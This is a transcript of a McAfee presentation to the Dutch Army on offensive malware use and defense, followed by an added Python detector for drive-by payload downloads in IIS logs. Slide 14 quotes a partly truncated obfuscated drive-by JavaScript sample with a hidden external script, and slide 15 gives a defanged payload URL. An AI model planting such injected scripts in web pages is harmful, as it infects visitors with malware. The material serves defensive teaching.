Offensive malware usage and defense

Presentation for the Dutch Army around cyberwarfare and the usage of malware.

Published in: Technology
Transcript

  • 1. Malware: Offensive usage and how to defend. Christiaan Beek, McAfee Professional Services
  • 2. Agenda
      • $whoami
      • Examples
      • Offensive ways of using malware
      • What goes wrong
      • Defense recommendations
      • Final thoughts
  • 3. > whoami
      • Christiaan Beek
      • Practice lead IR & Forensics EMEA
      • Developer/Instructor MFIRE
      • Training CERTs
  • 4. A Little Background: Foundstone Services – McAfee Strategic Security
  • 5. OFFENSE
  • 6. Offensive usage of malware: Energy & Infra, Financial, Medical, Mobile, Defense
  • 7. Offensive usage of malware. Why malware?
      • low profile during preparation
      • many options to spread / infect
      • many ways to hide
      • self destruct mechanism
      • many ways to transfer data to
  • 8. Offensive usage of malware
      • More and more discovery of malware frameworks
      • Multiple modules / components
      • Written by pros, sponsored by nations
  • 9. Offensive - What’s Different?
      Development: Nation-States; Truly customized payloads
      Delivery: Zero day propagation; Multi-vectored: Bluetooth, USB, network
      Detection: Digitally signed with compromised certificates; Outbound ex-filtration masking
      Command & Control: Central command; Modular payloads
      Intent: Surveillance; Disrupt / Destroy
  • 10. Stages of an attack:
  • 11. Stages of an attack:
  • 12. Stages of an attack:
  • 13. Stages of an attack:
  • 14. Stages of an attack – first script script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script type="text/javascript"> if(document.cookie.indexOf("DCHJEik8=")==-1 && hiOC2.indexOf("linux")<=-1 && hiOC2.indexOf("bot")==-1 && hiOC2.indexOf("spider")==-1) var jMJFRp3=deconcept.SWFObjectUtil.getPlayerVersion(); var expires=new Date(); expires.setTime(expires.getTime()+1*60*60*1000); document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString(); for(WdkimKX2=0,gNRb4=true,sAgnGw8=["msie","firefox","opera"];gNRb4;WdkimKX2++){gNRb4=gNRb4 && (navigator.userAgent.toLowerCase().indexOf(sAgnGw8[WdkimKX2])>-1);if(WdkimKX2==sAgnGw8.length- 1)WdkimKX2=-1;}Hwqq6="0";delete Hwqq6;try{Hwqq6+="0"+"0";}catch(e){yltBe1=unescape;mYSdOxl6 = eval;}CwefLf0=“S1+ADphS1(hmacmx8)))^MqiovxR7);}try{new function(){EmIcO0(EJiD6);}}catch(e){try{new function(){Qkrnq6=parseInt;vKFaTPR4(EJiD6);}}catch(e) } </script> <DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript" src="hxxp://count2.51yes……….. 31931&logo=12" charset="gb2312"></script></DIV>
  • 15. Final destination?: hxxp://222.7x.xx.xx.xx/x.exe
  • 16. Inner working?
  • 17. IIS logs on hacked ‘landing’ server:
      9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe
      9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe
      9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe
      9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe
      9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe
      9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe
      9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe
      Dial 80 or 443
  • 18. War story
  • 19. Future usage of malware
  • 20. Future scenarios
  • 21. Future scenarios or real...?
  • 22. Future scenarios
  • 23. Future scenarios
  • 24. Future scenarios
  • 25. Future scenarios
  • 26. Future scenarios
  • 27. Future scenarios
  • 28. What goes wrong regarding Defense? An Intel company
  • 29. Problem #1: Many solutions, but how to use them? Forensic readiness?
  • 30. Problem #2: No visibility on the network; no correlation of events
  • 31. Problem #3: Lack of skilled, experienced and dedicated people
  • 32. Problem #4: No Incident Response procedures; no dry-run exercise
  • 33. Problem #5: The attack came from…..
  • 34. Problem #6: Destroying evidence
  • 35. Problem #7: Who is the system owner? Who will take action? Who is allowed to take decisions?
  • 36. Defense Strategies
  • 37. The Big “Threat” Picture (nested circles, outer to inner): All Threats; All Known Threats; Threats AntiVirus Sees; Core Threats AntiVirus Protects
  • 38. The “Core” Security Problem
      • “Unauthorized” Execution – Payload/attachment/link – Network – Privilege
      • “Authorized” Execution – Insiders misuse of privilege
      Around the end users (End Users = Data): Identity Thieves, Spammers, Bot Herders, Vulnerability Discoverers, Tool Developers, Malware Developers
  • 39. Defense-in-depth
  • 40. Worthless without:
  • 41. Final thoughts......
      - Incidents happen
      - Is forensic & malware readiness on your agenda?
      - What needs to be changed in your process?
      - Is your {army-unit/company/agency/etc} prepared?
      - Did you separate critical infrastructures?
      - Can we help you?
  • 42. Thank you! Keep in touch: Email: Christiaan_Beek@McAfee dot com; Twitter: @FSEMEA @Foundstone @ChristaanBeek
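Slide 17 shows what a compromised landing server looks like from the web-server side: many unrelated clients pulling the same executable within minutes. The following is an added example (not from the presentation) of turning that observation into a detection over IIS-style log lines of the shape shown on the slide; the log lines and the TEST-NET client addresses are constructed, and the field order (date, time, client IP, site, port, method, URI) and the `min_clients` threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the layout of slide 17; client addresses are TEST-NET ranges.
SAMPLE_LOG = """\
9/23/2012 4:06:16 192.0.2.10 W3SVC1 80 GET /x.exe
9/23/2012 4:07:46 198.51.100.7 W3SVC1 80 GET /x.exe
9/23/2012 4:08:25 203.0.113.5 W3SVC1 80 GET /index.html
9/23/2012 4:14:48 203.0.113.42 W3SVC1 80 GET /x.exe
9/23/2012 4:36:05 192.0.2.77 W3SVC1 80 GET /pay/x.exe
9/23/2012 5:15:23 203.0.113.42 W3SVC1 80 GET /x.exe
9/23/2012 5:29:27 198.51.100.99 W3SVC1 80 GET /x.exe
"""

# date time client site port method uri (assumed field order, as on the slide)
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d+) (\S+) (\S+)$")
EXEC_EXT = (".exe", ".scr", ".dll", ".msi")


def parse_line(line):
    """Return a dict for one log line, or None if the line does not match the layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    date, time, client, site, port, method, uri = m.groups()
    return {"date": date, "time": time, "client": client, "site": site,
            "port": int(port), "method": method, "uri": uri}


def find_payload_downloads(text, min_clients=3):
    """Group executable fetches by URI; report URIs pulled by many distinct clients.

    A static site rarely serves the same .exe to a crowd of unrelated addresses
    in a short window, so this is a cheap first-pass signal for a drive-by
    landing page; the threshold is an assumption to tune per site.
    """
    clients_by_uri = defaultdict(set)
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["method"] != "GET":
            continue  # skip malformed lines and non-download methods
        if rec["uri"].lower().endswith(EXEC_EXT):
            clients_by_uri[rec["uri"]].add(rec["client"])
    return {uri: sorted(c) for uri, c in clients_by_uri.items() if len(c) >= min_clients}


if __name__ == "__main__":
    for uri, clients in find_payload_downloads(SAMPLE_LOG).items():
        print(f"{uri}: fetched by {len(clients)} distinct clients: {', '.join(clients)}")
```

Repeated fetches from one client (203.0.113.42 above) count once, so a single curious analyst re-downloading the file does not inflate the signal.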
